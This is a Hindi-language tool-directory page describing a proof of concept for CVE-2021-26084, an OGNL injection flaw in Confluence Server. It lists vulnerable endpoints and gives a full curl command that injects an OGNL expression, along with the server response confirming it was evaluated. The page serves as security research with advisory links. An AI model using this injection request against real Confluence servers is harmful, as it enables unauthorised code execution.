Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-26084_PoC — CVE-2021-26084 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/alt3kx/cve-2021-26084_poc
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

CVE-2021-26084 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन को प्रदर्शित करता है।

रिपॉजिटरी देखें
5316485 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL इंजेक्शन

एक OGNL इंजेक्शन भेद्यता मौजूद है जो एक प्रमाणित उपयोगकर्ता, और कुछ मामलों में अप्रमाणित उपयोगकर्ता को, Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देगी।

poc

प्रवेश बिंदुओं और इंजेक्शनों का पता लगाने की मेरी लड़ाई XD

लड़ाई (1)लड़ाई (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium
2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

अंततः Confluence प्रवेश बिंदुओं का शोषण किया गया

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

मेरा पहला मैन्युअल निरीक्षण: नोट: पूर्व-प्रमाणित उपयोगकर्ता

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

सर्वर प्रतिक्रिया: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

संदर्भ:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

अद्भुत राइटअप यहाँ पोस्ट किया गया:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

कुछ बहुत उपयोगी संकेत द्वारा:
@wvuuuuuuuuuuuuu
@iamnoooob

लेखक

Alex Hernandez उर्फ (@_alt3kx_)

टूल डाउनलोड करें